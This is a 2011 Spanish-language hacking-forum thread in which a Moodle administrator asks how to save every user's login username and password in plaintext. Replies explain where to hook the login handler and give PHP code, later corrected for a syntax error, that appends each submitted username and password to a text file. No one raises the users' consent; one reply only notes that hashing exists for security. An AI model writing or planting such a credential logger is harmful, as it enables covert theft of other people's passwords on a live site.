elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  Modificar el formulario login de Moodle
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Modificar el formulario login de Moodle  (Leído 12,611 veces)
Luisinho_dinho

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Modificar el formulario login de Moodle
« en: 5 Abril 2011, 19:02 pm »

Tengo una plataforma moodle. Me gustaría modificarla para que, cada vez que alguien inicie sesión, se guarde usuario y contraseña en un archivo de texto o que se guarde en la base de datos sin codificar.

Investigando un poco, supongo que el formulario es este:
Código:
   <form action="<?php echo $CFG->httpswwwroot; ?>/login/index.php" method="post" id="login">
          <div class="loginform">
            <div class="form-label"><label for="username"><?php print_string("username") ?></label></div>
            <div class="form-input">
              <input type="text" name="username" id="username" size="15" value="<?php p($frm->username) ?>" />
            </div>
            <div class="clearer"><!-- --></div>
            <div class="form-label"><label for="password"><?php print_string("password") ?></label></div>
            <div class="form-input">
              <input type="password" name="password" id="password" size="15" value="" />
              <input type="submit" id="loginbtn" value="<?php print_string("login") ?>" />
              <div class="forgetpass"><a href="forgot_password.php"><?php print_string("forgotten") ?></a></div>
            </div>
            <div class="clearer"><!-- --></div>
          </div>
        </form>
      </div>
¿Cómo puedo hacerlo?

¡Gracias por su ayuda!


En línea

~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 1.125



Ver Perfil
Re: Modificar el formulario login de Moodle
« Respuesta #1 en: 5 Abril 2011, 20:10 pm »

Esta codificado por seguridad, asi si alguien logra ingresar a la base de datos, puede tener todos los password...

Lo unico que tienes que hacer es crear una tabla o modificar una, y luego ir ingresando los datos...


En línea

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
Luisinho_dinho

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: Modificar el formulario login de Moodle
« Respuesta #2 en: 5 Abril 2011, 22:53 pm »

Pero, ¿Cómo hago que la contraseña ingresada se mande y se guarde en la base de datos? Mi nivel de PHP es bastante limitado.
En línea

~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 1.125



Ver Perfil
Re: Modificar el formulario login de Moodle
« Respuesta #3 en: 5 Abril 2011, 22:57 pm »

Ps es necesario saber MYSQL y PHP...
En línea

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
merolhack

Desconectado Desconectado

Mensajes: 278

Me encanta Joomla y lo que puedo hacer con el


Ver Perfil WWW
Re: Modificar el formulario login de Moodle
« Respuesta #4 en: 6 Abril 2011, 03:14 am »

Hola, tienes que modificar los archivos PHP del login, en donde recibe los datos de ese formulario.

Bájate el Notepad++ y busca lo siguiente en todos los archivos:
$_POST['username']
Si no encuentras nada prueba con username

Ya que lo encuentres, toma ese valor y has un simple codigo que escriba un TXT:
Código:
$filename = "01042011/log4.txt";
$fh = fopen($filename, 'a+') or die("can't open file");
$stringData = "Usuario: "$_POST['username'] . " Contraseña: ".$_POST['password'];
fwrite($fh, $stringData);
fclose($fh);
En línea

PHP Web Developer
Joomla, jQuery, MySQL, CSS, etc...

Android APP Developer http://android-dev.tumblr.com/
Luisinho_dinho

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: Modificar el formulario login de Moodle
« Respuesta #5 en: 11 Abril 2011, 23:40 pm »

El código que me has pasado me da error en la 3º línea.
Código:
Parse error: syntax error, unexpected T_VARIABLE in /srv/www/htdocs/moodle/login/index.php on line 294
Corresponde a la línea:
Código:
$stringData = "Usuario: "$_POST['username'] . " Contraseña: ".$_POST['password'];

En línea

merolhack

Desconectado Desconectado

Mensajes: 278

Me encanta Joomla y lo que puedo hacer con el


Ver Perfil WWW
Re: Modificar el formulario login de Moodle
« Respuesta #6 en: 12 Abril 2011, 06:43 am »

Ah perdon, es algo así la concatenación:
Citar
$stringData = "Usuario: ".$_POST['username'] . " Contraseña: ".$_POST['password'];

Pero OJO, esto lo tienes que revisar bien en los archivos de Moodle, ya que no se si ahí es donde reciba los datos por POST, a mi Moodle se me hace que esta mal hecho...
En línea

PHP Web Developer
Joomla, jQuery, MySQL, CSS, etc...

Android APP Developer http://android-dev.tumblr.com/
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Modificar el skin de un formulario sin dependencias.
Programación Visual Basic
WHK 0 1,245 Último mensaje 30 Enero 2008, 23:49 pm
por WHK
Formulario Login, pagina web.
Desarrollo Web
vaXy 4 2,891 Último mensaje 21 Enero 2013, 16:03 pm
por vaXy
[Ayuda] poner formulario de login de joomla en español
Desarrollo Web
Graphixx 1 2,247 Último mensaje 26 Abril 2013, 03:39 am
por #!drvy
Copiar formulario moodle
Scripting
carlipus 0 1,745 Último mensaje 20 Abril 2016, 16:21 pm
por carlipus
[Pregunta]: Formulario login se auto completa
Desarrollo Web
Leguim 0 1,923 Último mensaje 30 Diciembre 2021, 04:32 am
por Leguim
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines